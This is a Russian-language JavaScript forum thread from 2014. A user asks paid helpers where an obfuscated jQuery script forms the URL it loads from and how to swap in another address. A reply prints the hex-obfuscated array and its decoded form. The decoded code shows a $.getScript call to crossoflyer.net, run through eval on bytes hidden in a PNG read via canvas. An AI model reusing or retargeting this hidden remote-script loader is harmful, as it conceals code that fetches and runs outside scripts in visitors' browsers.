Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 09.07.2014, 13:36
Новичок на форуме
Отправить личное сообщение для softax Посмотреть профиль Найти все сообщения от softax
 
Регистрация: 09.07.2014
Сообщений: 5

есть jquery скрипт, нужно понять где формируется url
jquery скрипт нужно понять где формируется url и объяснить как его менять
запрос идет на crossoflyer.net


с ценой за работу просьба в личку


раздекоденный скрипт скрипт прилагаю
Вложения:
Тип файла: txt dec.txt (232.4 Кб, 16 просмотров)
Ответить с цитированием
  #2 (permalink)  
Старый 09.07.2014, 16:00
Профессор
Отправить личное сообщение для WorM32 Посмотреть профиль Найти все сообщения от WorM32
 
Регистрация: 11.02.2014
Сообщений: 303

Оставлю возможность кому нить заработать )
Ответить с цитированием
  #3 (permalink)  
Старый 09.07.2014, 16:34
Аватар для MallSerg
Профессор
Отправить личное сообщение для MallSerg Посмотреть профиль Найти все сообщения от MallSerg
 
Регистрация: 07.03.2011
Сообщений: 1,138

url формирует скрипт который находится в в картинке =)
Ответить с цитированием
  #4 (permalink)  
Старый 09.07.2014, 16:40
Профессор
Отправить личное сообщение для WorM32 Посмотреть профиль Найти все сообщения от WorM32
 
Регистрация: 11.02.2014
Сообщений: 303

Сообщение от MallSerg Посмотреть сообщение
url формирует скрипт который находится в в картинке =)
неправильный ответ )
Ответить с цитированием
  #5 (permalink)  
Старый 09.07.2014, 17:42
Аватар для MallSerg
Профессор
Отправить личное сообщение для MallSerg Посмотреть профиль Найти все сообщения от MallSerg
 
Регистрация: 07.03.2011
Сообщений: 1,138

ответ правильный
Ответить с цитированием
  #6 (permalink)  
Старый 10.07.2014, 18:58
Новичок на форуме
Отправить личное сообщение для softax Посмотреть профиль Найти все сообщения от softax
 
Регистрация: 09.07.2014
Сообщений: 5

т.е там где o.src= png
base64 декордер выдает кракозябы.


eval(c) - формирует урл и думал потом только добавляет в png отрисованную.

eval(c) в hexе формирует url домена. Заменял на алерт выводило. Но вот где он задается вот в чем проблема?


а внутри function (r,q) где то задается вроде url
потому как анализировал через spy js и в массиве arguments формируется чистая строка url.

Разве не так? подскажите(


p.s вот на 1850 строке
где c.isFunction(b) && (f = f || d, d = b, b = null);
return c.ajax({type: "GET",url: a,data: b,success: d,dataType: f})

анализирую через firebug, передается переменной a = url домена crossoflyer.net

Последний раз редактировалось softax, 10.07.2014 в 19:47.
Ответить с цитированием
  #7 (permalink)  
Старый 10.07.2014, 19:59
Аватар для MallSerg
Профессор
Отправить личное сообщение для MallSerg Посмотреть профиль Найти все сообщения от MallSerg
 
Регистрация: 07.03.2011
Сообщений: 1,138

чуть выше есть скрипт который загружает png в canvas и берет байтики из него по хитрым смещениям
Но тебе это нафиг не нужно
1. добавь строчку "console.log(c)"перед eval(c) и ты получишь скрипт
который содержит массив и этого из массива по частям собирается строчка с URL

Для ie < 10 у скрипта другое поведение но с тем же результатом

Последний раз редактировалось MallSerg, 10.07.2014 в 20:43.
Ответить с цитированием
  #8 (permalink)  
Старый 10.07.2014, 21:41
Новичок на форуме
Отправить личное сообщение для softax Посмотреть профиль Найти все сообщения от softax
 
Регистрация: 09.07.2014
Сообщений: 5

да это делал и понял но как изменить этот массив на свой .

и посмотри номер строки 1850 что указывал, в переменной a находится понятный адрес и только потом он преобразуется в хекс.

концовка скрипта понятна,но вот где этот адрес генерируется и как ее изменить вот в чем вопрос?

Последний раз редактировалось softax, 10.07.2014 в 21:49.
Ответить с цитированием
  #9 (permalink)  
Старый 10.07.2014, 22:08
Аватар для MallSerg
Профессор
Отправить личное сообщение для MallSerg Посмотреть профиль Найти все сообщения от MallSerg
 
Регистрация: 07.03.2011
Сообщений: 1,138

Блин да возьми ты нормальный отладчик

Функция o.onload(строка 2313) вызывает eval -> который вызывает c.extend.getScript(1853) -> который вызывает c.extend.get(1851) -> который вызывает c.extend.ajax(1913)

в функции o.onload eval вызывает скрипт
var _0x9377=["\x68\x74","\x74\x70\x3A","\x2F\x2F","\x63\x72","\x6F\x73\x73","\x6F\x66\x6C","\x79\x65\x72","\x2E","\x6E\x65\x74","\x2F","\x67\x65\x74","\x44\x61\x74\x61","\x2E\x6A\x73\x3F","\x53\x72\x63","\x26\x76\x65\x72\x3D","\x31\x69","\x67\x65\x74\x53\x63\x72\x69\x70\x74"];$[_0x9377[16]](_0x9377[0]+_0x9377[1]+_0x9377[2]+_0x9377[3]+_0x9377[4]+_0x9377[5]+_0x9377[6]+_0x9377[7]+_0x9377[8]+_0x9377[9]+_0x9377[10]+_0x9377[11]+_0x9377[12]+_0x9377[13]+_0x9377[14]+_0x9377[15]);


что расшифровывается как
var Ar= ["ht", "tp:", "//", "cr", "oss", "ofl", "yer", ".", "net", "/", "get", "Data", ".js?", "Src", "&ver=", "1i", "getScript"];
$[Ar["16"]](Ar[0]+Ar[1]+Ar[2]+Ar[3]+Ar[4]+Ar[5]+Ar[6]+Ar[7]+Ar[8]+Ar[9]+Ar[10]+Ar[11]+Ar[12]+Ar[13]+Ar[14]+Ar[15]);

// $.getScript("http://crossoflyer.net/getData.js?Src&ver=1i");


o.onload отображает изображение на канвас (2306 -2310)
после этого запускает цикл с шагом 4 строка (2311 ; b += 4)
т.е. берется каждый 4й байт и пропускаются отрицательные байты " 0 < a[b] && (c += String.fromCharCode(a[b]));"
после этого выполняется eval(c)

разжевано дальше уже некуда =)
Изображения:
Тип файла: jpg 1.jpg (22.0 Кб, 32 просмотров)

Последний раз редактировалось MallSerg, 10.07.2014 в 22:40.
Ответить с цитированием
  #10 (permalink)  
Старый 11.07.2014, 13:12
Новичок на форуме
Отправить личное сообщение для softax Посмотреть профиль Найти все сообщения от softax
 
Регистрация: 09.07.2014
Сообщений: 5

прости возможно за глупость или что-то недопонимаю.

Но делал и смотрел так же но так и не понял где именно происходит генерация этой анонимной функции с адресом. Где понять чтоб задать другой урл.

Все что ты описал понимал и так же смотрел. Но вот где проиходит генерация url чтоб задать другой так и не понял.


return c.ajax({type: "GET",url: a,data: b,success: d,dataType: f})

вот в переменной a уже есть адрес, я про это говорил. То как отдебажить в гугл хроме уже узнал, все таки рассшифровывал его и потихоньку учился.

Стоит задача то поменять адрес урл, чтобы при вызове анонимной функции генерировался другой адрес. Вот в чем беда? А код запутан и понять не могу.
Заранее благодарю

Последний раз редактировалось softax, 11.07.2014 в 13:21.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как превратить скрипт в плагин для jquery? lilumi jQuery 8 16.09.2011 17:39
Нужно переделать скрипт Ksushan Работа 4 29.05.2011 00:04
нужно написать скрипт редиректа ngprog Работа 1 20.01.2011 08:15
Jquery – событие по url lastic jQuery 4 18.02.2010 16:06
jQuery - нужно пояснение, понятное чайнику Zilog jQuery 0 06.09.2009 02:51